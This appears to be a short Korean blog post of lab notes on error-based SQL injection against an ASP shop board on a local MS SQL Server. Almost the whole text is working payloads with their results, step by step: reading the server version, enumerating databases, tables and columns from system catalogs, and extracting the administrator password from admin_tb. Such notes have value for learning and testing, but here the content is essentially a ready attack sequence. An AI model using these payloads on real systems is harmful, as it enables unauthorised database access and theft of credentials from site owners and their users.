버전 확인
hxxp://localhost/shop_board/shop_board_list.asp?page=1&v_num=
26 and @@version=1--
DB 확인
26 and (select db_name())=1--
id 번호에 해당하는 DB 이름 확인
26 and (select name from master..sysdatabases where dbid=2)=1--
1 -> master
2 -> tempdb
3 -> model
12 -> oyesmall
테이블명 확인 (해당 DB 중 제외할 테이블명을 조건으로 입력)
26 and (select top 1 name from oyesmall.dbo.sysobjects where xtype='U' and name <> 'poll_tail')=1--
admin_tb
banner
컬럼명 확인 (첫번째 필드명)
26 and (select top 1 syscolumns.name from sysobjects INNER JOIN syscolumns ON sysobjects.id = syscolumns.id where sysobjects.name='admin_tb')=1--
adminid
adminpwd
email
gubun
and syscolumns.name <> '제외할 필드명')--
26 and (select top 1 syscolumns.name from sysobjects INNER JOIN syscolumns ON sysobjects.id = syscolumns.id where sysobjects.name='admin_tb' and syscolumns.name <> 'adminid' and syscolumns.name <> 'adminpwd' and syscolumns.name <> 'email')=1--
테이블의 컬럼 값 확인
26 and (select adminpwd from admin_tb)=1--
admin
lab
'웹' 카테고리의 다른 글
| [SQL Injection] Blind SQL Injection Python 코드 (0) | 2018.01.29 |
|---|